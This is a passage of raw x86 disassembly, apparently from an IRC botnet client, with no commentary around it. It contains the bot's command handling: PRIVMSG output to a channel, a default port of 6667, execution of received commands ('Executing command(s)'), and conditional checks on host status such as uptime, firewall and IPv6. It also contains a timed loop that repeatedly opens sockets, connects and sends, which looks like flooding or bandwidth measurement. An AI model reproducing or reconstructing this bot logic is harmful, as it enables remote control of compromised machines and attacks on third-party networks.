mov al, [eax+ecx-9]
mov [ebp+var_6398], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-8]
mov [ebp+var_6397], al
and [ebp+var_6396], 0
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-7]
mov [ebp+var_6395], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-6]
mov [ebp+var_6394], al
and [ebp+var_6393], 0
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-4]
mov [ebp+var_6392], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-3]
mov [ebp+var_6391], al
and [ebp+var_6390], 0
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-2]
mov [ebp+var_638F], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-1]
mov [ebp+var_638E], al
and [ebp+var_638D], 0
lea eax, [ebp+var_638F]
push eax
call sub_40A8AD
pop ecx
push eax
lea eax, [ebp+var_6392]
push eax
call sub_40A8AD
pop ecx
push eax
lea eax, [ebp+var_6395]
push eax
call sub_40A8AD
pop ecx
push eax
lea eax, [ebp+var_6398]
push eax
call sub_40A8AD
pop ecx
push eax
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419860
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 1Ch
jmp short loc_40C375
; ---------------------------------------------------------------------------
loc_40C35B: ; CODE XREF: sub_40A9CF+1866�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419844
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40C375: ; CODE XREF: sub_40A9CF+198A�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C37A: ; CODE XREF: sub_40A9CF+1818�j
mov eax, [ebp+var_1A8]
sub eax, dword_419838
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C4B0
call sub_416B64 ; clock
mov [ebp+var_639C], eax
and [ebp+var_63A4], 0
and [ebp+var_63A0], 0
push 10h
push 0
lea eax, [ebp+var_63B4]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_63B4], 2
loc_40C3C8: ; CODE XREF: sub_40A9CF+1A95�j
call sub_416B64 ; clock
sub eax, [ebp+var_639C]
cmp eax, 3E8h
jnb loc_40C469
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
push eax
call dword_417238 ; ntohs
mov [ebp+var_63B2], ax
push 4
push 0
call sub_4040E8
pop ecx
pop ecx
mov [ebp+var_63B0], eax
push 0
push 2
push 2
call dword_417218 ; socket
mov [ebp+var_63B8], eax
push 10h
lea eax, [ebp+var_63B4]
push eax
push [ebp+var_63B8]
call dword_4171F4 ; connect
push 0
push 1
lea eax, [ebp+var_63A0]
push eax
push [ebp+var_63B8]
call dword_41720C ; send
push [ebp+var_63B8]
call dword_417230 ; closesocket
mov eax, [ebp+var_63A4]
add eax, 2Bh
mov [ebp+var_63A4], eax
jmp loc_40C3C8
; ---------------------------------------------------------------------------
loc_40C469: ; CODE XREF: sub_40A9CF+1A09�j
cmp [ebp+var_63A4], 400h
jbe short loc_40C483
mov eax, [ebp+var_63A4]
mov [ebp+var_6408], eax
jmp short loc_40C48D
; ---------------------------------------------------------------------------
loc_40C483: ; CODE XREF: sub_40A9CF+1AA4�j
mov [ebp+var_6408], 400h
loc_40C48D: ; CODE XREF: sub_40A9CF+1AB2�j
mov eax, [ebp+var_6408]
shr eax, 0Ah
push eax
push offset dword_419820
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C4B0: ; CODE XREF: sub_40A9CF+19BE�j
mov eax, [ebp+var_1A8]
sub eax, dword_419818
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C4DA
mov eax, [ebp+var_1A8]
sub eax, dword_41980C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C4FF
loc_40C4DA: ; CODE XREF: sub_40A9CF+1AF4�j
push offset dword_41DCBC
push 3B7h
push 0
push offset dword_4197E8
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 14h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C4FF: ; CODE XREF: sub_40A9CF+1B09�j
mov eax, [ebp+var_1A8]
sub eax, dword_4197DC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C53A
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4142BF
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C53A: ; CODE XREF: sub_40A9CF+1B43�j
mov eax, [ebp+var_1A8]
sub eax, dword_4197D4
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C564
mov eax, [ebp+var_1A8]
sub eax, dword_4197C8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C576
loc_40C564: ; CODE XREF: sub_40A9CF+1B7E�j
lea eax, [ebp+var_1A4]
push eax
call sub_4087C4
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C576: ; CODE XREF: sub_40A9CF+1B93�j
mov eax, [ebp+var_1A8]
sub eax, dword_4197C0
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C5A0
mov eax, [ebp+var_1A8]
sub eax, dword_4197B4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C5B2
loc_40C5A0: ; CODE XREF: sub_40A9CF+1BBA�j
lea eax, [ebp+var_1A4]
push eax
call sub_408E4A
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C5B2: ; CODE XREF: sub_40A9CF+1BCF�j
mov eax, [ebp+var_1A8]
sub eax, dword_4197A4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C614
push 1
push offset a9252 ; "9252"
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_63BC], eax
push [ebp+var_63BC]
push offset dword_418B5C
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
cmp [ebp+var_63BC], 0
jnz short loc_40C603
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C603: ; CODE XREF: sub_40A9CF+1C2D�j
push [ebp+var_63BC]
call sub_404CBB
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C614: ; CODE XREF: sub_40A9CF+1BF6�j
mov eax, [ebp+var_1A8]
sub eax, dword_419790
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C63B
lea eax, [ebp+var_1A4]
push eax
call sub_4091E2
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C63B: ; CODE XREF: sub_40A9CF+1C58�j
mov eax, [ebp+var_1A8]
sub eax, dword_419788
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C669
mov eax, [ebp+var_1A8]
sub eax, dword_41977C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C896
loc_40C669: ; CODE XREF: sub_40A9CF+1C7F�j
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40C686
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_640C], eax
jmp short loc_40C68D
; ---------------------------------------------------------------------------
loc_40C686: ; CODE XREF: sub_40A9CF+1CA1�j
and [ebp+var_640C], 0
loc_40C68D: ; CODE XREF: sub_40A9CF+1CB5�j
mov eax, [ebp+var_640C]
mov [ebp+var_63C8], eax
call sub_4092A4
mov [ebp+var_63E0], eax
mov eax, [ebp+var_63E0]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_63D8], eax
mov eax, [ebp+var_63E0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_63C4], eax
mov eax, [ebp+var_63E0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp+var_63D4], eax
mov eax, [ebp+var_63D8]
cmp eax, [ebp+var_63C8]
jnb short loc_40C715
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C715: ; CODE XREF: sub_40A9CF+1D3F�j
call sub_409318
mov [ebp+var_63C0], eax
mov eax, [ebp+var_63C0]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_63CC], eax
mov eax, [ebp+var_63C0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_63DC], eax
mov eax, [ebp+var_63C0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp+var_63D0], eax
cmp [ebp+var_63D0], 1
jnz short loc_40C793
mov [ebp+var_6410], offset byte_41DEC0
jmp short loc_40C79D
; ---------------------------------------------------------------------------
loc_40C793: ; CODE XREF: sub_40A9CF+1DB6�j
mov [ebp+var_6410], offset dword_4191F4
loc_40C79D: ; CODE XREF: sub_40A9CF+1DC2�j
cmp [ebp+var_63DC], 1
jnz short loc_40C7B2
mov [ebp+var_6414], offset byte_41DEC0
jmp short loc_40C7BC
; ---------------------------------------------------------------------------
loc_40C7B2: ; CODE XREF: sub_40A9CF+1DD5�j
mov [ebp+var_6414], offset dword_4191F4
loc_40C7BC: ; CODE XREF: sub_40A9CF+1DE1�j
cmp [ebp+var_63CC], 1
jnz short loc_40C7D1
mov [ebp+var_6418], offset byte_41DEC0
jmp short loc_40C7DB
; ---------------------------------------------------------------------------
loc_40C7D1: ; CODE XREF: sub_40A9CF+1DF4�j
mov [ebp+var_6418], offset dword_4191F4
loc_40C7DB: ; CODE XREF: sub_40A9CF+1E00�j
cmp [ebp+var_63D4], 1
jnz short loc_40C7F0
mov [ebp+var_641C], offset byte_41DEC0
jmp short loc_40C7FA
; ---------------------------------------------------------------------------
loc_40C7F0: ; CODE XREF: sub_40A9CF+1E13�j
mov [ebp+var_641C], offset dword_4191F4
loc_40C7FA: ; CODE XREF: sub_40A9CF+1E1F�j
cmp [ebp+var_63C4], 1
jnz short loc_40C80F
mov [ebp+var_6420], offset byte_41DEC0
jmp short loc_40C819
; ---------------------------------------------------------------------------
loc_40C80F: ; CODE XREF: sub_40A9CF+1E32�j
mov [ebp+var_6420], offset dword_4191F4
loc_40C819: ; CODE XREF: sub_40A9CF+1E3E�j
cmp [ebp+var_63D8], 1
jnz short loc_40C82E
mov [ebp+var_6424], offset byte_41DEC0
jmp short loc_40C838
; ---------------------------------------------------------------------------
loc_40C82E: ; CODE XREF: sub_40A9CF+1E51�j
mov [ebp+var_6424], offset dword_4191F4
loc_40C838: ; CODE XREF: sub_40A9CF+1E5D�j
push [ebp+var_6410]
push [ebp+var_63D0]
push [ebp+var_6414]
push [ebp+var_63DC]
push [ebp+var_6418]
push [ebp+var_63CC]
push [ebp+var_641C]
push [ebp+var_63D4]
push [ebp+var_6420]
push [ebp+var_63C4]
push [ebp+var_6424]
push [ebp+var_63D8]
push offset dword_419708
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 38h
jmp short loc_40C912
; ---------------------------------------------------------------------------
loc_40C896: ; CODE XREF: sub_40A9CF+1C94�j
mov eax, [ebp+var_1A8]
sub eax, dword_419700
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C912
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40C8BD
mov eax, [ebp+arg_14]
cmp dword ptr [eax+8], 0
jnz short loc_40C8BF
loc_40C8BD: ; CODE XREF: sub_40A9CF+1EE3�j
jmp short loc_40C912
; ---------------------------------------------------------------------------
loc_40C8BF: ; CODE XREF: sub_40A9CF+1EEC�j
push 2
push offset aId ; "id"
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_40C8EA
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
push offset byte_41EF58
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40C8EA: ; CODE XREF: sub_40A9CF+1F07�j
push offset aUsername ; "username"
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40C912
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
push offset byte_41F0D8
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40C912: ; CODE XREF: sub_40A9CF+85�j
; sub_40A9CF+D8�j ...
pop edi
pop esi
leave
retn
sub_40A9CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C916 proc near ; CODE XREF: sub_40CA29+47F�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
loc_40C919: ; CODE XREF: sub_40C916+1F�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_40C937
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C937
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
jmp short loc_40C919
; ---------------------------------------------------------------------------
loc_40C937: ; CODE XREF: sub_40C916+C�j
; sub_40C916+16�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_40C916 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C93C proc near ; DATA XREF: sub_40CEB0+66�o
var_534 = dword ptr -534h
var_530 = byte ptr -530h
var_38F = byte ptr -38Fh
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 534h
push 327h
push [ebp+arg_0]
lea eax, [ebp+var_534]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_208]
push eax
push offset asc_419F48 ; ";"
lea eax, [ebp+var_530]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_204], eax
and [ebp+var_20C], 0
loc_40C98D: ; CODE XREF: sub_40C93C+D6�j
cmp [ebp+var_204], 0
jnz short loc_40C998
jmp short loc_40CA17
; ---------------------------------------------------------------------------
loc_40C998: ; CODE XREF: sub_40C93C+58�j
; sub_40C93C+79�j
mov eax, [ebp+var_204]
movsx eax, byte ptr [eax]
cmp eax, 20h
jz short loc_40C9A8
jmp short loc_40C9B7
; ---------------------------------------------------------------------------
loc_40C9A8: ; CODE XREF: sub_40C93C+68�j
mov eax, [ebp+var_204]
inc eax
mov [ebp+var_204], eax
jmp short loc_40C998
; ---------------------------------------------------------------------------
loc_40C9B7: ; CODE XREF: sub_40C93C+6A�j
push [ebp+var_204]
lea eax, [ebp+var_38F]
push eax
push offset aLinkLink@linkP ; "link!link@link PRIVMSG %s :%s"
push 200h
lea eax, [ebp+var_200]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_200]
push eax
call sub_40E618
pop ecx
lea eax, [ebp+var_208]
push eax
push offset asc_419F48 ; ";"
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_20C], eax
mov eax, [ebp+var_20C]
mov [ebp+var_204], eax
jmp loc_40C98D
; ---------------------------------------------------------------------------
loc_40CA17: ; CODE XREF: sub_40C93C+5A�j
push [ebp+var_534]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_40C93C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CA29 proc near ; CODE XREF: sub_40CEB0+8�p
var_1EC = dword ptr -1ECh
var_1E8 = byte ptr -1E8h
var_1C8 = byte ptr -1C8h
var_1A8 = dword ptr -1A8h
var_1A4 = dword ptr -1A4h
var_1A0 = byte ptr -1A0h
var_190 = byte ptr -190h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1ECh
cmp [ebp+arg_0], 0
jz short loc_40CA43
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 28h
jz short loc_40CA4A
loc_40CA43: ; CODE XREF: sub_40CA29+D�j
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CA4A: ; CODE XREF: sub_40CA29+18�j
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
push offset asc_419FB0 ; ")"
push [ebp+arg_0]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_40CA70
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CA70: ; CODE XREF: sub_40CA29+3E�j
mov eax, [ebp+var_10]
sub eax, [ebp+arg_0]
inc eax
cmp eax, 180h
jbe short loc_40CA8A
mov [ebp+var_1EC], 180h
jmp short loc_40CA97
; ---------------------------------------------------------------------------
loc_40CA8A: ; CODE XREF: sub_40CA29+53�j
mov eax, [ebp+var_10]
sub eax, [ebp+arg_0]
inc eax
mov [ebp+var_1EC], eax
loc_40CA97: ; CODE XREF: sub_40CA29+5F�j
push [ebp+var_1EC]
push [ebp+arg_0]
lea eax, [ebp+var_190]
push eax
call sub_407A56
add esp, 0Ch
push 1
push 1
lea eax, [ebp+var_190]
push eax
call sub_407C2C
add esp, 0Ch
lea eax, [ebp+var_8]
push eax
push offset asc_419FAC ; "&&"
lea eax, [ebp+var_190]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_4], eax
and [ebp+var_C], 0
loc_40CAE1: ; CODE XREF: sub_40CA29+475�j
cmp [ebp+var_4], 0
jnz short loc_40CAEC
jmp loc_40CEA3
; ---------------------------------------------------------------------------
loc_40CAEC: ; CODE XREF: sub_40CA29+BC�j
; sub_40CA29+D7�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 20h
jz short loc_40CAF9
jmp short loc_40CB02
; ---------------------------------------------------------------------------
loc_40CAF9: ; CODE XREF: sub_40CA29+CC�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
jmp short loc_40CAEC
; ---------------------------------------------------------------------------
loc_40CB02: ; CODE XREF: sub_40CA29+CE�j
lea eax, [ebp+var_1E8]
push eax
lea eax, [ebp+var_1A0]
push eax
lea eax, [ebp+var_1C8]
push eax
push offset a32s16s32s ; "%32s %16s %32s"
push [ebp+var_4]
call sub_416BA2 ; sscanf
add esp, 14h
cmp eax, 3
jz short loc_40CB33
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CB33: ; CODE XREF: sub_40CA29+101�j
lea eax, [ebp+var_1C8]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1A4], eax
lea eax, [ebp+var_1E8]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1A8], eax
cmp [ebp+var_1A4], 0
jnz loc_40CC6E
push offset dword_418F50
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jz loc_40CC6E
push offset aUptime ; "$uptime"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CBB1
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_1A4], eax
jmp loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CBB1: ; CODE XREF: sub_40CA29+16D�j
push offset aVersion ; "$version"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CBD7
mov [ebp+var_1A4], 3B7h
jmp loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CBD7: ; CODE XREF: sub_40CA29+19D�j
push offset aFree ; "$free"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CBFB
call sub_408E8E
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CBFB: ; CODE XREF: sub_40CA29+1C3�j
push offset aLatency ; "$latency"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CC1F
call sub_408887
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CC1F: ; CODE XREF: sub_40CA29+1E7�j
push offset aFirewall ; "$firewall"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CC43
call sub_404279
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CC43: ; CODE XREF: sub_40CA29+20B�j
push offset aIpv6 ; "$ipv6"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CC67
call sub_4043E9
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CC67: ; CODE XREF: sub_40CA29+22F�j
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CC6E: ; CODE XREF: sub_40CA29+137�j
; sub_40CA29+152�j ...
cmp [ebp+var_1A8], 0
jnz loc_40CD83
push offset dword_418F50
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jz loc_40CD83
push offset aUptime ; "$uptime"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CCC6
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_1A8], eax
jmp loc_40CD83
; ---------------------------------------------------------------------------
loc_40CCC6: ; CODE XREF: sub_40CA29+282�j
push offset aVersion ; "$version"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CCEC
mov [ebp+var_1A8], 3B7h
jmp loc_40CD83
; ---------------------------------------------------------------------------
loc_40CCEC: ; CODE XREF: sub_40CA29+2B2�j
push offset aFree ; "$free"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD10
call sub_408E8E
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD10: ; CODE XREF: sub_40CA29+2D8�j
push offset aLatency ; "$latency"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD34
call sub_408887
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD34: ; CODE XREF: sub_40CA29+2FC�j
push offset aFirewall ; "$firewall"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD58
call sub_404279
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD58: ; CODE XREF: sub_40CA29+320�j
push offset aIpv6 ; "$ipv6"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD7C
call sub_4043E9
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD7C: ; CODE XREF: sub_40CA29+344�j
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CD83: ; CODE XREF: sub_40CA29+24C�j
; sub_40CA29+267�j ...
push offset asc_419F5C ; "=="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CDAF
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jz short loc_40CDAF
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CDAF: ; CODE XREF: sub_40CA29+36F�j
; sub_40CA29+37D�j
push offset asc_419F58 ; "!="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CDDB
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jnz short loc_40CDDB
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CDDB: ; CODE XREF: sub_40CA29+39B�j
; sub_40CA29+3A9�j
push offset asc_419F54 ; ">"
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE07
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
ja short loc_40CE07
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE07: ; CODE XREF: sub_40CA29+3C7�j
; sub_40CA29+3D5�j
push offset asc_419F50 ; ">="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE30
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jnb short loc_40CE30
xor eax, eax
jmp short locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE30: ; CODE XREF: sub_40CA29+3F3�j
; sub_40CA29+401�j
push offset dword_419968
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE59
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jb short loc_40CE59
xor eax, eax
jmp short locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE59: ; CODE XREF: sub_40CA29+41C�j
; sub_40CA29+42A�j
push offset asc_419F4C ; "<="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE82
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jbe short loc_40CE82
xor eax, eax
jmp short locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE82: ; CODE XREF: sub_40CA29+445�j
; sub_40CA29+453�j
lea eax, [ebp+var_8]
push eax
push offset asc_419FAC ; "&&"
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
jmp loc_40CAE1
; ---------------------------------------------------------------------------
loc_40CEA3: ; CODE XREF: sub_40CA29+BE�j
mov eax, [ebp+var_10]
inc eax
push eax
call sub_40C916
pop ecx
locret_40CEAE: ; CODE XREF: sub_40CA29+1C�j
; sub_40CA29+42�j ...
leave
retn
sub_40CA29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CEB0 proc near ; CODE XREF: sub_40A9CF+14CE�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_4]
call sub_40CA29
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_40CEC9
jmp short locret_40CF23
; ---------------------------------------------------------------------------
loc_40CEC9: ; CODE XREF: sub_40CEB0+15�j
push 327h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40CEDF
jmp short locret_40CF23
; ---------------------------------------------------------------------------
loc_40CEDF: ; CODE XREF: sub_40CEB0+2B�j
push 180h
push [ebp+var_8]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 184h
push eax
call sub_405F67
pop ecx
pop ecx
push [ebp+var_8]
push offset aExecutingComma ; "Executing command(s): %s"
push 0
push [ebp+var_4]
push offset sub_40C93C
call sub_4095A4
add esp, 14h
locret_40CF23: ; CODE XREF: sub_40CEB0+17�j
; sub_40CEB0+2D�j
leave
retn
sub_40CEB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CF25 proc near ; CODE XREF: sub_4020C2+B3�p
; sub_40D871+59B�p ...
push ebp
mov ebp, esp
mov eax, dword_41EA34
pop ebp
retn
sub_40CF25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CF2F proc near ; CODE XREF: sub_40D366+D�p
; sub_40D366+8E�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
jz short loc_40CF9E
push [ebp+arg_0]
push offset dword_41E928
call sub_416B3A ; strcpy
pop ecx
pop ecx
cmp [ebp+arg_4], 0
jz short loc_40CF60
push [ebp+arg_4]
push offset dword_41EA28
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_40CF71
; ---------------------------------------------------------------------------
loc_40CF60: ; CODE XREF: sub_40CF2F+1E�j
push offset a6667 ; "6667"
push offset dword_41EA28
